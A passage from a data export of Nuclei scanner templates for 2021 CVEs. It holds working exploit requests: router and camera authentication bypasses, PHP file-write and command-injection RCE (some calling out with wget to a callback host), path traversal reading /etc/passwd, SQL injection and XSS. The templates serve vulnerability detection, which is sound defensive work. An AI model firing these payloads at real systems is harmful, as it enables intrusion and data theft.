severity: critical\n description: \"ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator application. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\\0' matches the device's default value of '\\0' in some situations.\"\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to the router's settings, allowing an attacker to modify configurations, intercept network traffic, or launch further attacks.\n remediation: |\n Apply the latest firmware update provided by ASUS to fix the authentication bypass vulnerability (CVE-2021-32030).\n reference:\n - https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32030\n - https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md\n - https://www.asus.com/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AC2900/HelpDesk_BIOS/\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-32030\n cwe-id: CWE-287\n epss-score: 0.48092\n epss-percentile: 0.9739\n cpe: cpe:2.3:o:asus:gt-ac2900_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: asus\n product: gt-ac2900_firmware\n tags: cve2021,cve,asus,auth-bypass,router\n\nhttp:\n - raw:\n - |\n GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1\n Host: {{Hostname}}\n User-Agent: asusrouter--\n Referer: {{BaseURL}}\n Cookie: asus_token=\\0Invalid; clickedItem_tab=0\n\n matchers-condition: and\n matchers:\n - type: word\n part: header\n words:\n - application/json\n\n - type: word\n words:\n - \"get_cfg_clientlist\"\n - \"alias\"\n - \"model_name\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022017a99b0dbcb7156774fecefd56dc839f32ad4c10124e7b7c024b15913ce6edca0220272077c41feca50f7508d555d34b81f8063ea73eb3c1be6a19bdf83c0b6529bb:922c64590222798bb761d5b6d8e72950", "hash": "365725b313f0cf82b9f43f8d26e54ac8", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308356" }, "name": "CVE-2021-32172.yaml", "content": "id: CVE-2021-32172\n\ninfo:\n name: Maian Cart <=3.8 - Remote Code Execution\n author: pdteam\n severity: critical\n description: Maian Cart 3.0 to 3.8 via the elFinder file manager plugin contains a remote code execution vulnerability.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Upgrade to a patched version of Maian Cart (>=3.8) to mitigate this vulnerability.\n reference:\n - https://dreyand.github.io/maian-cart-rce/\n - https://github.com/DreyAnd/maian-cart-rce\n - https://www.maianscriptworld.co.uk/critical-updates\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32172\n - https://www.maianscriptworld.co.uk/\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-32172\n cwe-id: CWE-862\n epss-score: 0.26906\n epss-percentile: 0.9666\n cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:*\n metadata:\n max-request: 3\n vendor: maianscriptworld\n product: maian_cart\n tags: cve2021,cve,rce,unauth,maian,intrusive,maianscriptworld\n\nhttp:\n - raw:\n - |\n GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n - |\n POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/javascript, /; q=0.01\n Accept-Language: en-US,en;q=0.5\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n\n cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e\n - |\n GET /product-downloads/{{randstr}}.php HTTP/1.1\n Host: {{Hostname}}\n Accept: */*\n\n matchers:\n - type: dsl\n dsl:\n - contains(body_3, \"{{randstr_1}}\")\n - status_code_3 == 200\n condition: and\n\n extractors:\n - type: regex\n name: hash\n group: 1\n regex:\n - '\"hash\"\\:\"(.*?)\"\\,'\n internal: true\n# digest: 4a0a00473045022100f283d7d444b82bed6cb1b19183a7f8d6bd8a88b11fc96b76cf49b230e8411e33022031f36c8b57fef33da59619e15c70ed2bd9771ec966a72529b3de2267bc883b76:922c64590222798bb761d5b6d8e72950", "hash": "da1388d72db4557997eb205c49fc25ea", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308357" }, "name": "CVE-2021-3223.yaml", "content": "id: CVE-2021-3223\n\ninfo:\n name: Node RED Dashboard <2.26.2 - Local File Inclusion\n author: gy741,pikpikcu\n severity: high\n description: NodeRED-Dashboard before 2.26.2 is vulnerable to local file inclusion because it allows ui_base/js/..%2f directory traversal to read files.\n impact: |\n An attacker can exploit this vulnerability to access sensitive information, such as configuration files, credentials, or other sensitive data stored on the server.\n remediation: |\n Upgrade Node RED Dashboard to version 2.26.2 or later to mitigate the vulnerability.\n reference:\n - https://github.com/node-red/node-red-dashboard/issues/669\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3223\n - https://github.com/node-red/node-red-dashboard/releases/tag/2.26.2\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3223\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-3223\n cwe-id: CWE-22\n epss-score: 0.09614\n epss-percentile: 0.94637\n cpe: cpe:2.3:a:nodered:node-red-dashboard:*:*:*:*:*:node.js:*:*\n metadata:\n verified: true\n max-request: 2\n vendor: nodered\n product: node-red-dashboard\n framework: node.js\n shodan-query: title:\"Node-RED\"\n fofa-query: title=\"Node-RED\"\n tags: cve,cve2021,node-red-dashboard,lfi,nodered,node.js\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd'\n - '{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js'\n\n matchers-condition: or\n matchers:\n - type: word\n part: body\n words:\n - \"Node-RED web server is listening\"\n\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n# digest: 4a0a0047304502201018efcf4dfa0c313545ef9790e0659cb28de43d8e02fbd289666a7bd7fa02eb022100baa7210d4d9a2b15c8410c84b98b928a6b2db3f6591f6a64b1e7eb32144c7b6a:922c64590222798bb761d5b6d8e72950", "hash": "042719648e8cc10e8f2c6ee269800101", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308358" }, "name": "CVE-2021-32305.yaml", "content": "id: CVE-2021-32305\n\ninfo:\n name: Websvn <2.6.1 - Remote Code Execution\n author: gy741\n severity: critical\n description: WebSVN before 2.6.1 allows remote attackers to execute arbitrary commands via shell metacharacters in the search parameter.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.\n remediation: |\n Upgrade Websvn to version 2.6.1 or later to mitigate this vulnerability.\n reference:\n - https://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html\n - https://github.com/websvnphp/websvn/pull/142\n - http://packetstormsecurity.com/files/163225/Websvn-2.6.0-Remote-Code-Execution.html\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32305\n - https://github.com/HimmelAward/Goby_POC\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-32305\n cwe-id: CWE-78\n epss-score: 0.96624\n epss-percentile: 0.99551\n cpe: cpe:2.3:a:websvn:websvn:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: websvn\n product: websvn\n tags: cve,cve2021,websvn,rce,oast,packetstorm\n\nhttp:\n - raw:\n - |\n GET /search.php?search=%22;wget+http%3A%2F%2F{{interactsh-url}}%27;%22 HTTP/1.1\n Host: {{Hostname}}\n Accept-Encoding: gzip, deflate\n Accept: */*\n\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n# digest: 4a0a004730450221009ec1af813526ec351de2e4387e1431e02ad09de992301f04fd375ba73fb6f1a60220323dd195f75cbe7e968736f53295b34315c102e888ccae87108e2a25bcc60247:922c64590222798bb761d5b6d8e72950", "hash": "5a08d0553e5d5f950dbb07385bfca168", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308359" }, "name": "CVE-2021-32618.yaml", "content": "id: CVE-2021-32618\n\ninfo:\n name: Python Flask-Security - Open Redirect\n author: 0x_Akoko\n severity: medium\n description: Python Flask-Security contains an open redirect vulnerability. Existing code validates that the URL specified in the next parameter is either relative or has the same network location as the requesting URL. Certain browsers accept and fill in the blanks of possibly incomplete or malformed URLs. An attacker can redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n impact: |\n An attacker can craft a malicious URL that redirects users to a malicious website, leading to potential phishing attacks or the exploitation of other vulnerabilities.\n remediation: |\n Upgrade to the latest version of Python Flask-Security library to fix the open redirect vulnerability.\n reference:\n - https://github.com/Flask-Middleware/flask-security/security/advisories/GHSA-6qmf-fj6m-686c\n - https://github.com/Flask-Middleware/flask-security/issues/486\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32618\n - https://github.com/ARPSyndicate/cvemon\n - https://github.com/ARPSyndicate/kenzer-templates\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2021-32618\n cwe-id: CWE-601\n epss-score: 0.00113\n epss-percentile: 0.43765\n cpe: cpe:2.3:a:flask-security_project:flask-security:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: flask-security_project\n product: flask-security\n tags: cve2021,cve,redirect,flask,flask-security_project\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/login?next=\\\\\\interact.sh'\n\n matchers:\n - type: regex\n part: header\n regex:\n - '(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$' # https://regex101.com/r/L403F0/1\n# digest: 490a0046304402207acbef18aa0010bc58e52948c92c8959a2c354c33dc25185577d33bc3177847c0220208482a310a7fd0552de2030e8147b5a244bfed28dbb16a153d017b3f06bb690:922c64590222798bb761d5b6d8e72950", "hash": "8bbea25afa8873d29673eb20b6f3539c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30835a" }, "name": "CVE-2021-32682.yaml", "content": "id: CVE-2021-32682\n\ninfo:\n name: elFinder 2.1.58 - Remote Code Execution\n author: smaranchand\n severity: critical\n description: elFinder 2.1.58 is impacted by multiple remote code execution vulnerabilities that could allow an attacker to execute arbitrary code and commands on the server hosting the elFinder PHP connector, even with minimal configuration.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: Update to elFinder 2.1.59 or later. As a workaround, ensure the connector is not exposed without authentication.\n reference:\n - https://smaranchand.com.np/2022/01/organization-vendor-application-security/\n - https://blog.sonarsource.com/elfinder-case-study-of-web-file-manager-vulnerabilities\n - https://github.com/Studio-42/elFinder/security/advisories/GHSA-wph3-44rj-92pr\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32682\n - https://github.com/Studio-42/elFinder/commit/a106c350b7dfe666a81d6b576816db9fe0899b17\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-32682\n cwe-id: CWE-22\n epss-score: 0.97293\n epss-percentile: 0.99854\n cpe: cpe:2.3:a:std42:elfinder:*:*:*:*:*:*:*:*\n metadata:\n max-request: 9\n vendor: std42\n product: \"elfinder\"\n github: https://github.com/Studio-42/elFinder\n tags: cve2021,cve,elfinder,misconfig,rce,oss,std42\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/admin/elfinder/elfinder-cke.html\"\n - \"{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html\"\n - \"{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html\"\n - \"{{BaseURL}}/assets/elFinder/elfinder.html\"\n - \"{{BaseURL}}/backend/elfinder/elfinder-cke.html\"\n - \"{{BaseURL}}/elfinder/elfinder-cke.html\"\n - \"{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html\"\n - \"{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html\"\n - \"{{BaseURL}}/uploads/elfinder/elfinder-cke.html\"\n\n stop-at-first-match: true\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"elfinder\"\n - \"php/connector\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 490a0046304402203fd374bcfc7e0d1fb114e43721e82391d332bf970a505b476c6a4f46234d245002202cda416ffb5f16ec23002766e43acc4da7b06bf2294d3e7524a492b53d52fa15:922c64590222798bb761d5b6d8e72950", "hash": "283d00cb979f99623a2273be6afd1237", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30835b" }, "name": "CVE-2021-32789.yaml", "content": "id: CVE-2021-32789\n\ninfo:\n name: WooCommerce Blocks 2.5 to 5.5 - Unauthenticated SQL Injection\n author: rootxharsh,iamnoooob,S1r1u5_,cookiehanhoan,madrobot\n severity: high\n description: |\n woocommerce-gutenberg-products-block is a feature plugin for WooCommerce Gutenberg Blocks. An SQL injection vulnerability impacts all WooCommerce sites running the WooCommerce Blocks feature plugin between version 2.5.0 and prior to version 2.5.16. Via a carefully crafted URL, an exploit can be executed against the `wc/store/products/collection-data?calculate_attribute_counts[][taxonomy]` endpoint that allows the execution of a read only sql query. There are patches for many versions of this package, starting with version 2.5.16. There are no known workarounds aside from upgrading.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the affected system.\n remediation: |\n Update WooCommerce Blocks to version 5.6 or later to mitigate the vulnerability.\n reference:\n - https://woocommerce.com/posts/critical-vulnerability-detected-july-2021\n - https://viblo.asia/p/phan-tich-loi-unauthen-sql-injection-woocommerce-naQZRQyQKvx\n - https://securitynews.sonicwall.com/xmlpost/wordpress-woocommerce-plugin-sql-injection/\n - https://wpscan.com/vulnerability/0f2089dc-9376-4d7d-95a2-25c99526804a\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32789\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n cvss-score: 7.5\n cve-id: CVE-2021-32789\n cwe-id: CWE-89\n epss-score: 0.09336\n epss-percentile: 0.94559\n cpe: cpe:2.3:a:automattic:woocommerce_blocks:*:*:*:*:*:wordpress:*:*\n metadata:\n max-request: 1\n vendor: automattic\n product: woocommerce_blocks\n framework: wordpress\n tags: cve2021,cve,wordpress,woocommerce,sqli,wp-plugin,wp,wpscan,automattic\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500'\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - 'sqli-test'\n - 'attribute_counts'\n - 'price_range'\n - 'term'\n condition: and\n\n - type: word\n part: header\n words:\n - 'application/json'\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022100b54f8925ab16f82ba44c482f52bbf32655fb597eb5e2db8ad27f277ea244319802200a1c5a6db552aab8186869b0a59c19879ec2a61824d28b7674831cdeca90ecaa:922c64590222798bb761d5b6d8e72950", "hash": "b0922a05036e21c64ea82dd1231c9264", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30835c" }, "name": "CVE-2021-32819.yaml", "content": "id: CVE-2021-32819\n\ninfo:\n name: Nodejs Squirrelly - Remote Code Execution\n author: pikpikcu\n severity: high\n description: |\n Nodejs Squirrelly is susceptible to remote code execution. Squirrelly is a template engine implemented in JavaScript that works out of the box with ExpressJS. Squirrelly mixes pure template data with engine configuration options through the Express render API. By overwriting internal configuration options remote code execution may be triggered in downstream applications. There is currently no fix for these issues as of the publication of this CVE. The latest version of squirrelly is currently 8.0.8. For complete details refer to the referenced GHSL-2021-023.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.\n remediation: |\n Update to the latest version of Nodejs Squirrelly template engine to mitigate the vulnerability.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2021-023-squirrelly/\n - https://www.linuxlz.com/aqld/2331.html\n - https://blog.diefunction.io/vulnerabilities/ghsl-2021-023\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32819\n - https://github.com/squirrellyjs/squirrelly/commit/c12418a026f73df645ba927fd29358efe02fed1e\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\n cvss-score: 8.8\n cve-id: CVE-2021-32819\n cwe-id: CWE-200,NVD-CWE-noinfo\n epss-score: 0.82753\n epss-percentile: 0.98332\n cpe: cpe:2.3:a:squirrelly:squirrelly:8.0.8:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: squirrelly\n product: squirrelly\n tags: cve2021,cve,nodejs,rce,oast,squirrelly\n\nhttp:\n - method: GET\n path:\n - '{{BaseURL}}/?Express=aaaa&autoEscape=&defaultFilter=e%27);var+require=global.require+%7C%7C+global.process.mainModule.constructor._load;+require(%27child_process%27).exec(%27wget%20http://{{interactsh-url}}%27);//'\n\n matchers-condition: and\n matchers:\n - type: word\n part: interactsh_protocol # Confirms the HTTP Interaction\n words:\n - \"http\"\n\n - type: word\n part: interactsh_request\n words:\n - \"User-Agent: Wget\"\n# digest: 4b0a00483046022100aa7ca2c92f79ac28fd2150b51227335436fd18e936100074e82d284f2198fd38022100cae16de21e1e26871dbb8f7a3b598d17d4ed865611dbec02cdc8e762181bcceb:922c64590222798bb761d5b6d8e72950", "hash": "88511fd02aa15f04a99762b69c22047e", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30835d" }, "name": "CVE-2021-32820.yaml", "content": "id: CVE-2021-32820\n\ninfo:\n name: Express-handlebars - Local File Inclusion\n author: dhiyaneshDk\n severity: high\n description: Express-handlebars is susceptible to local file inclusion because it mixes pure template data with engine configuration options through the Express render API. More specifically, the layout parameter may trigger file disclosure vulnerabilities in downstream applications. This potential vulnerability is somewhat restricted in that only files with existing extensions (i.e., file.extension) can be included. Files that lack an extension will have .handlebars appended to them. For complete details refer to the referenced GHSL-2021-018 report. Notes in documentation have been added to help users avoid this potential information exposure vulnerability.\n impact: |\n An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.\n remediation: |\n Update to the latest version of Express-handlebars to mitigate the vulnerability.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2021-018-express-handlebars/\n - https://github.com/detectify/ugly-duckling/blob/master/modules/crowdsourced/CVE-2021-32820.json\n - https://github.com/express-handlebars/express-handlebars/pull/163\n - https://nvd.nist.gov/vuln/detail/CVE-2021-32820\n - https://github.com/express-handlebars/express-handlebars/blob/78c47a235c4ad7bc2674bddd8ec2721567ed8c72/README.md#danger-\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N\n cvss-score: 8.6\n cve-id: CVE-2021-32820\n cwe-id: CWE-94,CWE-200\n epss-score: 0.01304\n epss-percentile: 0.85598\n cpe: cpe:2.3:a:express_handlebars_project:express_handlebars:*:*:*:*:*:node.js:*:*\n metadata:\n max-request: 1\n vendor: express_handlebars_project\n product: express_handlebars\n framework: node.js\n tags: cve2021,cve,expressjs,lfi,xxe,express_handlebars_project,node.js\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/?layout=/etc/passwd\"\n\n matchers-condition: and\n matchers:\n - type: regex\n part: body\n regex:\n - \"root:.*:0:0:\"\n - \"daemon:[x*]:0:0:\"\n - \"operator:[x*]:0:0:\"\n condition: or\n\n - type: status\n status:\n - 200\n# digest: 490a00463044022069731ef6aa77f47e6209c6404ff6b4a5d8869413afa7d0197169a84bafb57ecc02203e27a5de4cb4ef4f62b3a78fddfdba82002813f1c55df47fcbbf83b0c7bf4da3:922c64590222798bb761d5b6d8e72950", "hash": "181b74520dd0228ffe3e878e3ab3b665", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30835e" }, "name": "CVE-2021-32853.yaml", "content": "id: CVE-2021-32853\n\ninfo:\n name: Erxes <0.23.0 - Cross-Site Scripting\n author: dwisiswant0\n severity: critical\n description: Erxes before 0.23.0 contains a cross-site scripting vulnerability. The value of topicID parameter is not escaped and is triggered in the enclosing script tag.\n impact: |\n Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.\n remediation: |\n Upgrade to Erxes version 0.23.0 or later to mitigate the vulnerability.\n reference:\n - https://securitylab.github.com/advisories/GHSL-2021-103-erxes/\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3285\n - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/views/widget.ejs#L14\n - https://github.com/erxes/erxes/blob/f131b49add72032650d483f044d00658908aaf4a/widgets/server/index.ts#L54\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H\n cvss-score: 9.6\n cve-id: CVE-2021-32853\n cwe-id: CWE-79\n epss-score: 0.01224\n epss-percentile: 0.83856\n cpe: cpe:2.3:a:erxes:erxes:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: erxes\n product: erxes\n shodan-query: http.title:\"erxes\"\n tags: cve2021,cve,xss,erxes,oss\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/widgets/knowledgebase?topicId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\"\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - 'topic_id: \"'\n - \"window.erxesEnv\"\n condition: and\n\n - type: word\n part: header\n words:\n - text/html\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502207aed0ce8a782de56c716be549d8c4fa15f2cbf9113c348db56bdfc9910776782022100a891ca50a47ab7c7ce36f2e1498bb7e8f44b168bfecfb59396015929d2525eb4:922c64590222798bb761d5b6d8e72950", "hash": "dbd32cc7aba3fa2f5e5ed9b55273de81", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf30835f" }, "name": "CVE-2021-3293.yaml", "content": "id: CVE-2021-3293\n\ninfo:\n name: emlog 5.3.1 Path Disclosure\n author: h1ei1\n severity: medium\n description: emlog v5.3.1 is susceptible to full path disclosure via t/index.php, which allows an attacker to see the path to the webroot/file.\n impact: |\n An attacker can gain knowledge of the server's file system structure, potentially leading to further attacks.\n remediation: |\n Apply the latest patch or upgrade to a version that fixes the vulnerability.\n reference:\n - https://github.com/emlog/emlog/issues/62\n - https://github.com/thinkgad/Bugs/blob/main/emlog%20v5.3.1%20has%20Full%20Path%20Disclosure%20vulnerability.md\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3293\n - https://github.com/Z0fhack/Goby_POC\n - https://github.com/20142995/Goby\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N\n cvss-score: 5.3\n cve-id: CVE-2021-3293\n cwe-id: CWE-22\n epss-score: 0.003\n epss-percentile: 0.68887\n cpe: cpe:2.3:a:emlog:emlog:5.3.1:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: emlog\n product: emlog\n tags: cve2021,cve,emlog,fpd\n\nhttp:\n - raw:\n - |\n GET /t/index.php?action[]=aaaa HTTP/1.1\n Host: {{Hostname}}\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Warning\"\n - \"on line\"\n - \"expects parameter\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a0047304502210096f3228cc4d490adee40d190e6f8d36714ca2e536391b5d273c5a498468135e3022055c714b2300176f083a94f6f93884821c80b2f2a760acd3453b6f62efaef4744:922c64590222798bb761d5b6d8e72950", "hash": "bd983c18ab9f2efc3f3f2df8b4d7e976", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308360" }, "name": "CVE-2021-3297.yaml", "content": "id: CVE-2021-3297\n\ninfo:\n name: Zyxel NBG2105 V1.00(AAGU.2)C0 - Authentication Bypass\n author: gy741\n severity: high\n description: Zyxel NBG2105 V1.00(AAGU.2)C0 devices are susceptible to authentication bypass vulnerabilities because setting the login cookie to 1 provides administrator access.\n impact: |\n Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, unauthorized configuration changes, and potential compromise of the affected device.\n remediation: |\n Apply the latest firmware update provided by Zyxel to fix the authentication bypass vulnerability.\n reference:\n - https://github.com/nieldk/vulnerabilities/blob/main/zyxel%20nbg2105/Admin%20bypass\n - https://www.zyxel.com/us/en/support/security_advisories.shtml\n - https://www.zyxel.com/support/SupportLandingSR.shtml?c=gb&l=en&kbid=M-01490&md=NBG2105\n - https://nvd.nist.gov/vuln/detail/CVE-2021-3297\n - https://github.com/ARPSyndicate/cvemon\n classification:\n cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 7.8\n cve-id: CVE-2021-3297\n cwe-id: CWE-287\n epss-score: 0.1939\n epss-percentile: 0.96173\n cpe: cpe:2.3:o:zyxel:nbg2105_firmware:v1.00\\(aagu.2\\)c0:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: zyxel\n product: nbg2105_firmware\n tags: cve,cve2021,zyxel,auth-bypass,router\n\nhttp:\n - raw:\n - |\n GET /status.htm HTTP/1.1\n Host: {{Hostname}}\n Cookie: language=en; login=1\n\n matchers-condition: and\n matchers:\n - type: word\n words:\n - \"Running Time\"\n - \"Firmware Version\"\n - \"Firmware Build Time\"\n condition: and\n\n - type: status\n status:\n - 200\n# digest: 4a0a00473045022063e3bd0343c282a0777ee7560b660fb802857d90d8db48f45a676f645bede369022100cbf65f25ecaeef1a1dfd59c493ad4d4286d2d866d00c53c917c2e47af040abee:922c64590222798bb761d5b6d8e72950", "hash": "d05b64ab83408b1efac7b1e800fb3e0d", "level": 5, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308361" }, "name": "CVE-2021-33044.yaml", "content": "id: CVE-2021-33044\n\ninfo:\n name: Dahua IPC/VTH/VTO - Authentication Bypass\n author: gy741\n severity: critical\n description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.\n impact: |\n An attacker can gain unauthorized access to the device, potentially compromising the security and privacy of the system.\n remediation: |\n Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability.\n reference:\n - https://github.com/dorkerdevil/CVE-2021-33044\n - https://nvd.nist.gov/vuln/detail/CVE-2021-33044\n - https://seclists.org/fulldisclosure/2021/Oct/13\n - https://www.dahuasecurity.com/support/cybersecurity/details/957\n classification:\n cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\n cvss-score: 9.8\n cve-id: CVE-2021-33044\n cwe-id: CWE-287\n epss-score: 0.29051\n epss-percentile: 0.96446\n cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*\n metadata:\n max-request: 1\n vendor: dahuasecurity\n product: ipc-hum7xxx_firmware\n tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity\n\nhttp:\n - raw:\n - |\n POST /RPC2_Login HTTP/1.1\n Host: {{Hostname}}\n Accept: application/json, text/javascript, */*; q=0.01\n Connection: close\n X-Requested-With: XMLHttpRequest\n Content-Type: application/x-www-form-urlencoded; charset=UTF-8\n Origin: {{BaseURL}}\n Referer: {{BaseURL}}\n\n {\"id\": 1, \"method\": \"global.login\", \"params\": {\"authorityType\": \"Default\", \"clientType\": \"NetKeyboard\", \"loginType\": \"Direct\", \"password\": \"Not Used\", \"passwordType\": \"Default\", \"userName\": \"admin\"}, \"session\": 0}\n\n matchers-condition: and\n matchers:\n - type: word\n part: body\n words:\n - '\"result\":true'\n - 'id'\n - 'params'\n - 'session'\n condition: and\n\n - type: status\n status:\n - 200\n\n extractors:\n - type: regex\n group: 1\n regex:\n - ',\"result\":true,\"session\":\"([a-z]+)\"\\}'\n part: body\n# digest: 4a0a00473045022100969dc816553940d4ba45200da238d7df4503480847dc4729f24dbeea283d51b302203e3bc11853da98fc6f17ca80f318604a3a94eb5fd28376a5c321efee7f7d1358:922c64590222798bb761d5b6d8e72950", "hash": "8bcc0e57b1344a644eecbb5b75219a14", "level": 6, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf308362" }, "name": 